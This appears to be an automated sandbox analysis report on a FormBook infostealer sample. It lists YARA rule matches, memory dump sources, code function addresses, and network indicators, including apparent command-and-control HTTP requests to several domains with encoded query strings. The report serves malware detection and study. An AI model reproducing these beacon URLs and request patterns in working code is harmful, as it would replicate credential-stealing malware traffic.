Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: unknown DNS traffic detected: queries for: www.vzn2aai2qj.icu
Source: C:\Windows\explorer.exe Code function: 42_2_05566F82 getaddrinfo,setsockopt,recv, 42_2_05566F82
Source: global traffic HTTP traffic detected: GET /u1p5/?y4Mp=vL5j7Eq3si3+pqkwq9GVQc9zWaxA/P/bTusMaerk9f3EW+lc0CCc1NhXRSl0Kt4KYFMx8zSAYw==&D0GHx=5jNT HTTP/1.1Host: www.shitcoin.teamConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u1p5/?y4Mp=jmW97e0DcxHZsiDt+DmiFhziWrO1jPfkTbEIn6OHXnuLtYKLIrDwNEu/EQYt2xDuBHghXZP9DQ==&D0GHx=5jNT HTTP/1.1Host: www.marymarinho.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD+HvWaQ2ttROIxFaz7G4unDmw6qRWL3K2g==&D0GHx=5jNT HTTP/1.1Host: www.bettingweb365.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
.NET source code contains very large strings
Source: H4vBtZsi8xAKaMm.exe, SimonGame.cs Long String: Length: 22528
Source: 1.0.H4vBtZsi8xAKaMm.exe.e30000.0.unpack, SimonGame.cs Long String: Length: 22528
Source: 1.2.H4vBtZsi8xAKaMm.exe.e30000.0.unpack, SimonGame.cs Long String: Length: 22528
Uses 32bit PE files
Source: H4vBtZsi8xAKaMm.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Code function: 1_2_019494A8 1_2_019494A8
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Code function: 1_2_0194C148 1_2_0194C148
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Code function: 1_2_0194A758 1_2_0194A758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00401030 14_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041E1DD 14_2_0041E1DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041E5E0 14_2_0041E5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00402D8C 14_2_00402D8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00402D90 14_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041E5BE 14_2_0041E5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00409E4C 14_2_00409E4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00409E50 14_2_00409E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_0041D6C5 14_2_0041D6C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00402FB0 14_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0B090 14_2_00F0B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FB1002 14_2_00FB1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F14120 14_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFF900 14_2_00EFF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2EBB0 14_2_00F2EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0841F 14_2_00F0841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0D5E0 14_2_00F0D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FC1D55 14_2_00FC1D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF0D20 14_2_00EF0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F16E30 14_2_00F16E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A520A0 19_2_04A520A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF20A8 19_2_04AF20A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3B090 19_2_04A3B090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF28EC 19_2_04AF28EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AE1002 19_2_04AE1002
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3841F 19_2_04A3841F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A52581 19_2_04A52581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A3D5E0 19_2_04A3D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF25DD 19_2_04AF25DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A20D20 19_2_04A20D20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A44120 19_2_04A44120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A2F900 19_2_04A2F900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF2D07 19_2_04AF2D07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF1D55 19_2_04AF1D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF22AE 19_2_04AF22AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF2EF7 19_2_04AF2EF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A46E30 19_2_04A46E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04A5EBB0 19_2_04A5EBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF1FF1 19_2_04AF1FF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AEDBD2 19_2_04AEDBD2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_04AF2B28 19_2_04AF2B28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABE1DD 19_2_00ABE1DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABE5BE 19_2_00ABE5BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00AA2D8C 19_2_00AA2D8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00AA2D90 19_2_00AA2D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABE5E0 19_2_00ABE5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00ABD6C5 19_2_00ABD6C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00AA9E4C 19_2_00AA9E4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00AA9E50 19_2_00AA9E50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_00AA2FB0 19_2_00AA2FB0
Source: C:\Windows\explorer.exe Code function: 30_2_05959232 30_2_05959232
Source: C:\Windows\explorer.exe Code function: 30_2_0595C5CD 30_2_0595C5CD
Source: C:\Windows\explorer.exe Code function: 30_2_05956912 30_2_05956912
Source: C:\Windows\explorer.exe Code function: 30_2_05950D02 30_2_05950D02
Source: C:\Windows\explorer.exe Code function: 30_2_05953B30 30_2_05953B30
Source: C:\Windows\explorer.exe Code function: 30_2_05953B32 30_2_05953B32
Source: C:\Windows\explorer.exe Code function: 30_2_0594F082 30_2_0594F082
Source: C:\Windows\explorer.exe Code function: 30_2_05958036 30_2_05958036
Source: C:\Windows\explorer.exe Code function: 42_2_05566232 42_2_05566232
Source: C:\Windows\explorer.exe Code function: 42_2_05563912 42_2_05563912
Source: C:\Windows\explorer.exe Code function: 42_2_0555DD02 42_2_0555DD02
Source: C:\Windows\explorer.exe Code function: 42_2_05560B32 42_2_05560B32
Source: C:\Windows\explorer.exe Code function: 42_2_05560B30 42_2_05560B30
Source: C:\Windows\explorer.exe Code function: 42_2_055695CD 42_2_055695CD
Source: C:\Windows\explorer.exe Code function: 42_2_05565036 42_2_05565036
Source: C:\Windows\explorer.exe Code function: 42_2_0555C082 42_2_0555C082
